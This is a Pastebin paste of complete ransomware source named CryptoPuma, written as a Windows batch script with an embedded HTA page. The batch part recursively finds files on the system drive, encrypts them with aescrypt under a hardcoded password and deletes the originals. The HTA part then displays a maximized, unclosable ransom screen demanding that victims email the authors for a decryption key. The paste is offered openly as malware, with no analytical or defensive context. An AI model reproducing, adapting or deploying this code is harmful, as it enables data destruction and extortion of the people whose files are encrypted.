FlyFar

CryptoPuma: A Light, Simple Batch-HTA Ransomware

Oct 24th, 2021 (edited)
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 2.02 KB | None | 0 0
  1. ::Start CryptoPuma
  2. @echo off
  3. mode con:cols=50 lines=2
  4. set pass=3346se9RaIxXF9m45nsmx7nL3bVudn91w4SNY8URDVa
  5.  
  6. Title CryptorPuma
  7.  
  8. echo Scanning. . . .
  9. REM Change file extension *.123test for *.doc
  10. FOR /R "%homedrive%\" %%X in (*.123test) DO (
  11. REM echo %%X >> %homedrive%\Original.txt SafeMode
  12. REM Rename "%%X" "%%~nX.bak" >NUL 2>&1 SafeMode  
  13. aescrypt -e -p %pass% "%%X"
  14. del "%%X"
  15. )
  16.  
  17.  
  18.  
  19. REM Block Screen
  20. cls
  21. setlocal
  22. for /F "delims=" %%a in ('mshta.exe "%~F0"') do set "HTA=%%a"
  23.  
  24. -->
  25.  
  26. <html>
  27.     <head>
  28.         <title>Attention Please!</title>
  29.     <hta:application id="oBVC"
  30.                      applicationname="BSOD"  
  31.                      version="1.0"
  32.                      maximizebutton="no"
  33.                      minimizebutton="no"
  34.                      sysmenu="no"
  35.                      Caption="no"
  36.                      windowstate="maximize"/>
  37.     <style>
  38.         #texto2{
  39.             padding-top: 19%;
  40.             letter-spacing: 1px;
  41.             text-align: center;
  42.         }
  43.     </style>
  44. </head>
  45. <body bgcolor="#8c1d1d" scroll="no">
  46.     <font face="Lucida Console" size="4" color="white">
  47. <center><p> - CryptoPuma - </p></center>
  48. <div id="texto2">
  49.     Your databases, files, photos, documents and other important files are encrypted!<br>
  50.     <br><br>
  51.     The only method of recovering files is to get an decrypt software and unique private key.<br>
  52.     <br><br>
  53.     After get the decryptor you will start decrypt software, enter your unique private key and it will decrypt all your data.<br>
  54.     <br><br><br>
  55.    Only we can give you this key and only we can recover your files.
  56.     <br><br>
  57.    You need to contact us by e-mail decrypt@cryptopuma.com send us your personal ID and wait for further instructions.
  58.     <br><br>
  59.    Your personal ID: 3346se9RaIxXF9m45nsmx7nL3bVudn91w4SNY8URDVa
  60.     <br><br>
  61.    Don't try any OTHER solution. ONLY US can decrypt your files.
  62.     <img id="imagen" alt="Candado" src="https://i.imgur.com/rytGPFG.png" height="130" width="100">
  63. </div>
  64. </body>
  65. </html>
Add Comment
Please, Sign In to add comment